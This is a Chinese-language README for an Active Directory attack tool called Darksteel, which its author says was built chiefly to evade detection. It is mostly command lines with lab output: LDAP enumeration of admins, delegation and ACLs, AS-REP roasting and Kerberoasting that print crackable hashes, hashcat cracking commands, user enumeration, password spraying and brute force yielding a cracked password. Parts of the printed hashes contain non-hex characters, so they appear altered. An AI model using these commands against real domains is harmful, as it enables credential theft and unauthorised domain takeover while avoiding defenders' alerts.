介绍

Darksteel 是一款域内自动化信息搜集并利用的工具。在渗透时发现单独搜集域内信息比较繁琐,漏洞利用也需要很多工具,所以完成此项目,帮助我解决域内信息搜集繁琐问题以及漏洞利用问题。此项目以规避检测为主要目的完成,直接对域控进行攻击的利用没有做,因为如果有设备会产生大量的告警,后续可能会添加bypass检测的利用。

功能演示

可不填写账号密码使用本地账号进行认证查询(-d参数需要填写域名)

  1. darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/
  10. v2.0.0
  12. [*] Domain Computers:
  13. WIN-KQH5FQSIJSH
  14. DESKTOP-AO8D722
  15. DESKTOP-DO7D913
  16. WIN-7UI852PL
  17. EXCHANGESERVER

项目主要功能

  1. ldap
  2. 当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
  4. kerberos
  5. 针对kerberos漏洞进行利用
  7. blast
  8. 爆破域用户
  10. computerip
  11. 批量查询域内计算机对应的ip
  1.  ____    ______  ____    __  __   ____    ______  ____    ____    __
  2. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \
  3. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  4.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  5.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  6.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  7.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/
  9.    v2.0.0
  11. 自动化域内信息搜集、kerberos利用工具
  13. Usage:
  14.   darksteel [command]
  16. Available Commands:
  17.   blast       爆破域内用户
  18.   completion  Generate the autocompletion script for the specified shell
  19.   computerip  查询域内计算机的ip地址
  20.   help        Help about any command
  21.   kerberos    kerberos利用
  22.   ldap        ldap查询
  24. Flags:
  25.   -d, --dc string       域控地址
  26.   -n, --domain string   域名
  27.   -h, --help            help for darksteel
  29. Use "darksteel [command] --help" for more information about a command.

使用实例

Ldap

1、当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v2.0.0
  13. [*] Domain User:
  14.         Administrator
  15.         Guest
  16.         krbtgt
  17.         wanliu
  18.         qt
  19.         zz
  20.         xx
  21.         exchangeuser
  22.         qt01
  23.         ac
  25. [*] Domain Admins:
  26.         CN=wanliu,CN=Users,DC=wanliu1,DC=com
  27.         CN=Administrator,CN=Users,DC=wanliu1,DC=com
  29. [*] AdminSDHolder:
  30.         Administrator
  31.         krbtgt
  32.         wanliu
  34. [*] sIDHistory:
  35. [*] Enterprise Admins:
  36.         CN=Administrator,CN=Users,DC=wanliu1,DC=com
  38. [*] OU :
  39.         Domain Controllers
  40.         Microsoft Exchange Security Groups
  42. [*] Ca Computer:
  43.         wanliu1-WIN-KQH5FQSIJSH-CA
  45. [*] Esc1 vulnerability template:
  47. [*] Esc2 vulnerability template:
  49. [*] MsSql Computer:
  50.         WIN-7UI852PL
  52. [*] Maq Number:
  53.         10
  55. [*] DC Computer:
  56.         WIN-KQH5FQSIJSH
  58. [*] Acl :
  59.         qt 完全控制 ------> ac
  60.         qt 修改密码 ------> zz
  61.         qt01 拥有DCSync权限
  63. [*] Trust Domain:
  65. [*] Domain Computers:
  66.         WIN-KQH5FQSIJSH
  67.         DESKTOP-AO8D722
  68.         DESKTOP-DO7D913
  69.         WIN-7UI852PL
  70.         EXCHANGESERVER
  72. [*] Survival Computer:
  73.         WIN-KQH5FQSIJSH --> Windows Server 2012 R2 Standard
  74.         DESKTOP-AO8D722 --> Windows 10 专业版
  75.         DESKTOP-DO7D913 --> Windows 10 专业版
  76.         WIN-7UI852PL --> Windows Server 2008 R2 Enterprise
  77.         EXCHANGESERVER --> Windows Server 2016 Datacenter
  79. [*] Exchange Servers:
  80.         CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  82. [*] Exchange Trusted Subsystem:
  83.         CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  85. [*] Exchange Organization Management:
  86.         CN=Administrator,CN=Users,DC=wanliu1,DC=com
  88. [*] Asreproast User:
  89.         xx
  91. [*] 非约束委派机器:
  92.         CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com [WIN-KQH5FQSIJSH]
  93. [*] 非约束委派用户:
  94.         CN=zz,CN=Users,DC=wanliu1,DC=com [zz]
  95. [*] 约束委派机器:
  96.         CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com [WIN-7UI852PL]
  97.         cifs/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  98.         cifs/WIN-KQH5FQSIJSH.wanliu1.com
  99.         cifs/WIN-KQH5FQSIJSH
  100.         cifs/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  101.         cifs/WIN-KQH5FQSIJSH/WANLIU1
  102. [*] 约束委派用户:
  103. [*] 基于资源约束委派:
  104.         CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com -> creator  S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  105.         CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com -> creator  S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  106.         CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com -> creator  S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  108. [*] SPN:CN=xx,CN=Users,DC=wanliu1,DC=com
  109.         cifs/admin
  111. [*] SPN:CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com
  112.         exchangeAB/WIN-KQH5FQSIJSH
  113.         exchangeAB/WIN-KQH5FQSIJSH.wanliu1.com
  114.         Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-KQH5FQSIJSH.wanliu1.com
  115.         ldap/WIN-KQH5FQSIJSH.wanliu1.com/ForestDnsZones.wanliu1.com
  116.         ldap/WIN-KQH5FQSIJSH.wanliu1.com/DomainDnsZones.wanliu1.com
  117.         TERMSRV/WIN-KQH5FQSIJSH
  118.         TERMSRV/WIN-KQH5FQSIJSH.wanliu1.com
  119.         DNS/WIN-KQH5FQSIJSH.wanliu1.com
  120.         GC/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  121.         RestrictedKrbHost/WIN-KQH5FQSIJSH.wanliu1.com
  122.         RestrictedKrbHost/WIN-KQH5FQSIJSH
  123.         RPC/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
  124.         HOST/WIN-KQH5FQSIJSH/WANLIU1
  125.         HOST/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  126.         HOST/WIN-KQH5FQSIJSH
  127.         HOST/WIN-KQH5FQSIJSH.wanliu1.com
  128.         HOST/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  129.         E3514235-4B06-11D1-AB04-00C04FC2DCD2/f20db9b6-b740-4670-ab3c-ead6acf58f4f/wanliu1.com
  130.         ldap/WIN-KQH5FQSIJSH/WANLIU1
  131.         ldap/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
  132.         ldap/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  133.         ldap/WIN-KQH5FQSIJSH
  134.         ldap/WIN-KQH5FQSIJSH.wanliu1.com
  135.         ldap/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  137. [*] SPN:CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  138.         IMAP/EXCHANGESERVER
  139.         IMAP/exchangeserver.wanliu1.com
  140.         IMAP4/EXCHANGESERVER
  141.         IMAP4/exchangeserver.wanliu1.com
  142.         POP/EXCHANGESERVER
  143.         POP/exchangeserver.wanliu1.com
  144.         POP3/EXCHANGESERVER
  145.         POP3/exchangeserver.wanliu1.com
  146.         exchangeRFR/EXCHANGESERVER
  147.         exchangeRFR/exchangeserver.wanliu1.com
  148.         exchangeAB/EXCHANGESERVER
  149.         exchangeAB/exchangeserver.wanliu1.com
  150.         exchangeMDB/EXCHANGESERVER
  151.         exchangeMDB/exchangeserver.wanliu1.com
  152.         SMTP/EXCHANGESERVER
  153.         SMTP/exchangeserver.wanliu1.com
  154.         SmtpSvc/EXCHANGESERVER
  155.         SmtpSvc/exchangeserver.wanliu1.com
  156.         TERMSRV/EXCHANGESERVER
  157.         TERMSRV/exchangeserver.wanliu1.com
  158.         WSMAN/exchangeserver
  159.         WSMAN/exchangeserver.wanliu1.com
  160.         RestrictedKrbHost/EXCHANGESERVER
  161.         HOST/EXCHANGESERVER
  162.         RestrictedKrbHost/exchangeserver.wanliu1.com
  163.         HOST/exchangeserver.wanliu1.com
  165. [*] SPN:CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com
  166.         TERMSRV/DESKTOP-AO8D722
  167.         TERMSRV/DESKTOP-AO8D722.wanliu1.com
  168.         RestrictedKrbHost/DESKTOP-AO8D722
  169.         HOST/DESKTOP-AO8D722
  170.         RestrictedKrbHost/DESKTOP-AO8D722.wanliu1.com
  171.         HOST/DESKTOP-AO8D722.wanliu1.com
  173. [*] SPN:CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com
  174.         TERMSRV/DESKTOP-DO7D913
  175.         TERMSRV/DESKTOP-DO7D913.wanliu1.com
  176.         RestrictedKrbHost/DESKTOP-DO7D913
  177.         HOST/DESKTOP-DO7D913
  178.         RestrictedKrbHost/DESKTOP-DO7D913.wanliu1.com
  179.         HOST/DESKTOP-DO7D913.wanliu1.com
  181. [*] SPN:CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com
  182.         WSMAN/WIN-7UI852PL
  183.         WSMAN/WIN-7UI852PL.wanliu1.com
  184.         TERMSRV/WIN-7UI852PL
  185.         TERMSRV/WIN-7UI852PL.wanliu1.com
  186.         MSSQLSvc/WIN-7UI852PL.wanliu1.com:1433
  187.         MSSQLSvc/WIN-7UI852PL.wanliu1.com
  188.         RestrictedKrbHost/WIN-7UI852PL
  189.         HOST/WIN-7UI852PL
  190.         RestrictedKrbHost/WIN-7UI852PL.wanliu1.com
  191.         HOST/WIN-7UI852PL.wanliu1.com
  193. [*] SPN:CN=krbtgt,CN=Users,DC=wanliu1,DC=com
  194.         kadmin/changepw
  196. [*] SPN:CN=zz,CN=Users,DC=wanliu1,DC=com
  197.         mssql/DESKTOP-AO8D722
2、当我们想要查找域内某些关键字对应的user或者computer时可以使用关键字查询,来找到哪些是管理员user和管理员computer
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  12. [*] CN=Administrators,CN=Builtin,DC=test,DC=com   --> 管理员对计算机/域有不受限制的完全访问权
  13. [*] CN=Schema Admins,CN=Users,DC=test,DC=com   --> 架构的指定系统管理员
  14. [*] CN=Enterprise Admins,CN=Users,DC=test,DC=com   --> 企业的指定系统管理员
  15. [*] CN=Domain Admins,CN=Users,DC=test,DC=com   --> 指定的域管理员
  16. [*] CN=zz,CN=Users,DC=test,DC=com   --> 假管理员
3、如果想查询的内容工具内没有写到也可以使用ldap语法进行查询
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  12. DN: CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=test,DC=com
  13. cn: [WIN-KQH5FQSIJSH]
  14. dNSHostName: [WIN-KQH5FQSIJSH.test.com]
  15. DN: CN=DESKTOP-AO8D722,CN=Computers,DC=test,DC=com
  16. cn: [DESKTOP-AO8D722]
  17. dNSHostName: [DESKTOP-AO8D722.test.com]
  18. DN: CN=DESKTOP-DO7D913,CN=Computers,DC=test,DC=com
  19. cn: [DESKTOP-DO7D913]
  20. dNSHostName: [DESKTOP-DO7D913.test.com]
  21. DN: CN=WIN-7UI852PL,CN=Computers,DC=test,DC=com
  22. cn: [WIN-7UI852PL]
  23. dNSHostName: [WIN-7UI852PL.test.com]

Kerberos

1、利用kerberos不需要域认证对用户密钥进行获取,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt —force
  1. darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  12. [*] Target domain: test.com (192.168.1.1)
  13. [*] Use LDAP to retreive vulnerable accounts
  14. [*] Ask AS-Rep for user zz without pre-authentication
  15. [*] Get a valid ticket with encryption: arcfour-hmac-md5
  16. [*] Hashes:
  17. $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
  18. af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
  19. 51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
  20. 69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
  21. a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
  22. 5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
  23. 7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
2、指定目标用户,则不需要域用户认证
  1. darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  12. [*] Target domain: test.com (192.168.1.1)
  13. [*] Ask AS-Rep for user zz without pre-authentication
  14. [*] Get a valid ticket with encryption: arcfour-hmac-md5
  15. [*] Hashes:
  16. $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
  17. af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
  18. 51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
  19. 69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
  20. a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
  21. 5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
  22. 7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
3、如果目标将用户设置了spn后,则可以将密钥输出,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt —force
  1. darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash) 
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  13. [*] Target domain: test.com (192.168.1.1)
  14. [*] Use username and password/key as credentials to request a TGT
  15. [*] Use LDAP to retreive vulnerable accounts
  16. [*] Found 1 users to Kerberoast found in LDAP
  17. [*] CN=zz,CN=Users,DC=test,DC=com
  18.     sAMAccountName      : zz
  19.     distinguishedName   : CN=zz,CN=Users,DC=test,DC=com
  20.     servicePrincipalName: mssql/DESKTOP-AO8D722
  21. [*] Asking TGS for principal: zz
  22. [*] Hashes:
  23. $krb5tgs$23$*zz$WANLIU1.COM$zz*$c1c2da2dbd793dbe2f627132f992e3a7$a3f77d350104545
  24. 3a8ab2917a0961d3ca54f4e97610d00ee5cb3ac03dbc84a9831d4bbd007d143619de8ca277e36c97
  25. 7f5e672396750350a14916b5dece2daa279e47f7684b03d044e9e748f5f3ce777efe73e4df64d814
  26. 75dd1217784fe78fabe7195f5dc659520081152c045574200bfe68aad97cc6c529c3d6e57eefbbaa
  27. f270fdcee23445ce160b4c71346753fd8464aa5e6073b8b0c9d6e3865a4f48dc61d05f9a97a4d0a5
  28. 6caf0ad0059e058e4746e260d2905e429e31ed7655c87fghtf5654f54c9e506d3b737f678f9fd2bd
  29. 68c226e61f852a6c1e35ceb3b1f6f3c78f1160ddb4ea290870eff55f4ba6ca0161a5bf5545a8da59
  30. fe20610aafa91fbbe7b8e8f3ff715f965bd09681aa41b929f98a94f8084fca1cb98f38e718612f1e
  31. 51d779c622ae91e0ee62bd2a809b59e0031f57c2647b8ef15972015f3669a80d489139153d20312b
  32. c8f9be5252fc6ed6dd78a22dec9458d41e6a940534d33c8ajhhgj5f36d224332fec721874e46fea7
  33. b2397922c6cbe689ef0ff7d0cb1c9d89c975c462a746ae5d473b9cfc37fadcecc96a3907980a13b9
  34. 28cd053467090458ab0a8995e1237cef641698172d6537c2ef4e5987726d6a007b03ffec867f3ab8
  35. 5fd1ce7e89f6bc694266c61ca74e6af2200bfa3a90313bbda3282ed267e6f59d477e789e4c454f66
  36. ac942df4461fc2bad317e23176e8cc299261c1c947dca068153b2fab47b018b2e82ba08d20078195
  37. 8149dd3b03c27ec17bee22496c7cccb3e6acd23c6e7bce62658f7274ce3eef06aa16d4c94bbfbe42
  38. 3f9e7b7254625d28c27fbf2bc07aeec63f7ebe25b49742346eea44e61478e212d719be9c98a53a1c
  39. 2657790c02654fa1c9caf5bdbb816cece4e6ce6e48c86323a8596f059b9d4e4856d52480f56272a5
  40. a393473eaf0ab12b3e085aa97ee28311c4cd54797229522001a3e5fd5fdefgrg4e03efe691635448
  41. 392ea8275cb0916bcc205fb2376ae60008a24cdea072069ca4710d9290d77bab830cf96c97c31fb0
  42. bab707802409efbad0bb30c6efe207c75632225a52ec757f878e8d97647c34d6703e2a94f2701739
  43. 9ba6efd18a4f714b63468810929287ca3359fff00632ab5de545667d39d6e77456c1b7df57d400a7
  44. ec9ad23b0fc93f24f9c151d9509aeabfbb298a02865bd5d16a273fc6ffb8df14456e0b2eaf973653
  45. 895e7f51f73606294845d6a9ccab6a68b5774a706f06a692c4b619e50ac35fa48e1aadb6323c279f
  46. 68e4c6d29462bd82371a0f24744cbb43bf4ca3a6cca165fe4b4025a4b69a2208bd16eacb0a029973
  47. 86bff57b4fa0924713d7b32295096ac7cc7942299a0b5126880c768edcb7743a429ded7323941cdd
  48. c6293d7962553c7423b465d9c1c9aae98cf14e30ff0f21e8d75275a48dc1fac5bb37987057e74f83
  49. f7aeb47dc601826d6643f95c33c7d388a3120b08ed2864e0c0bdacfb41594cea5d286583ed2fd520
  50. 89857642a160760dca1cea4

blast

1、当我们找到域但还没有域用户的时候可以使用域用户枚举进行枚举域用户。想要输出失败信息可以使用-v参数
  1. darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  13. [+] USERNAME:    zz@test.com
  14. [+] USERNAME:    xx@test.com
  15. Done! Tested logins in 0.034 seconds
  19. darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt -v
  20.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  21. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  22. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  23.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  24.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  25.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  26.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  28.    v1.0.8
  31. [!] asdfqwadad@test.com - User does not exist
  32. [!] admin@test.com - User does not exist
  33. [+] USERNAME:    zz@test.com
  34. [+] USERNAME:    xx@test.com
  35. Done! Tested logins in 0.002 seconds
2、找到用户后使用单个密码进行爆破
  1. darksteel.exe blast -m passspray -d 192.168.1.1 -n test.com -U users.txt -p 123456
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  13. [+] SUCCESS:     zz@test.com:123456
  14. Done! Tested logins in 0.024 seconds
3、使用密码字典爆破单个用户
  1. darksteel.exe blast -m blastpass -d 192.168.1.1 -n test.com -u zz -P pass.txt
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  13. [+] SUCCESS:     zz@test.com:123456
